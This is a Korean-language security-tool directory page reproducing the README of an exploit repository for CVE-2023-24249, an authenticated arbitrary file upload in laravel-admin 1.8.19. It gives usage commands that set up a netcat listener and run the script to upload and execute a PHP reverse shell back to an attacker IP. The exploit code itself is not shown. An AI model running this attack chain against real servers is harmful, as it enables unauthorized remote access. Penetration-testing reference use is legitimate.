Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-24249-Exploit — CVE-2023-24249에 대한 익스플로잇 스크립트 - 파일 업로드 및 명령어 주입을 통해 원격 코드 실행을 허용하는 취약점. | Kitploit
도구/GitHubGitHub/iduzzel/cve-2023-24249-exploit
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubiduzzel/cve-2023-24249-exploit

CVE-2023-24249-Exploit

CVE-2023-24249에 대한 익스플로잇 스크립트 - 파일 업로드 및 명령어 주입을 통해 원격 코드 실행을 허용하는 취약점.

저장소 보기
912년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-24249 익스플로잇 스크립트

설명

이 리포지토리는 laravel-admin 버전 1.8.19에서 발견된 심각한 취약점인 CVE-2023-24249에 대한 익스플로잇 스크립트를 포함하고 있습니다. 이 취약점은 임의의 파일 업로드를 허용하여 공격자가 조작된 PHP 파일을 통해 임의의 코드를 실행할 수 있게 합니다. 이 익스플로잇은 공격자가 대상 애플리케이션에 리버스 셸을 업로드하고 실행하여 원격 접근을 얻는 방법을 보여줍니다.

취약점 세부 정보

CVE-2023-24249는 laravel-admin v1.8.19의 임의 파일 업로드 취약점입니다. 이 취약점은 공격자가 임의의 PHP 파일을 업로드하고 실행하여 잠재적인 원격 코드 실행을 유발할 수 있습니다.

  • 기본 점수: 7.2 높음
  • 벡터: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
  • 취약점 분류: CWE-434 - 위험한 유형의 파일 업로드 제한 없음

참고 자료

  • 익스플로잇 - 제3자 권고
  • Laravel Admin GitHub 리포지토리
  • Laravel Admin 공식 웹사이트

익스플로잇 스크립트

제공된 익스플로잇 스크립트는 CVE-2023-24249 익스플로잇 과정을 자동화합니다. 다음 단계를 수행합니다:

  1. 인증: 제공된 자격 증명을 사용하여 대상 애플리케이션에 로그인합니다.
  2. 리버스 셸 업로드: 취약한 파일 업로드 기능을 통해 PHP 리버스 셸 스크립트를 업로드합니다.
  3. 리버스 셸 실행: 업로드된 리버스 셸 스크립트에 GET 요청을 보내 실행하고 공격자 시스템으로의 연결을 설정합니다.

요구 사항

  • Python 3
  • requests 라이브러리
  • beautifulsoup4 라이브러리

pip를 사용하여 필요한 라이브러리를 설치하세요:

root@kitploit:~
pip install requests beautifulsoup4

사용법

  1. 리포지토리 클론:

    root@kitploit:~
    git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
    cd CVE-2023-24249-Exploit
    
  2. 시스템에서 리스너 시작:

    root@kitploit:~
    nc -lvnp <PORT>
    
  3. 익스플로잇 스크립트 실행:

    root@kitploit:~
    python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
    

    <TARGET_URL>, <USERNAME>, <PASSWORD>, <YOUR_IP>, <YOUR_PORT>을 적절한 값으로 바꾸세요:

    • <TARGET_URL>: 대상 애플리케이션의 URL.
    • <USERNAME>: 인증을 위한 사용자 이름.
    • <PASSWORD>: 인증을 위한 비밀번호.
    • <YOUR_IP>: 리버스 셸 연결을 수신할 귀하의 IP 주소.

예시

root@kitploit:~
python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337

스크립트 출력

익스플로잇이 성공하면 스크립트는 다음과 같이 출력합니다:

root@kitploit:~
[+] Reverse shell uploaded successfully! Attempting to execute it...
[+] Reverse shell executed successfully! Check your listener at <YOUR_IP>:<YOUR_PORT>

면책 조항

이 스크립트는 교육 목적으로만 제공됩니다. 명시적 허가 없이 이 스크립트를 시스템에 대해 무단으로 사용하는 것은 불법이며 비윤리적입니다. 저자는 이 스크립트로 인한 오용이나 피해에 대해 책임을 지지 않습니다.

도구 다운로드
  • <YOUR_PORT>: 리스너가 실행 중인 포트.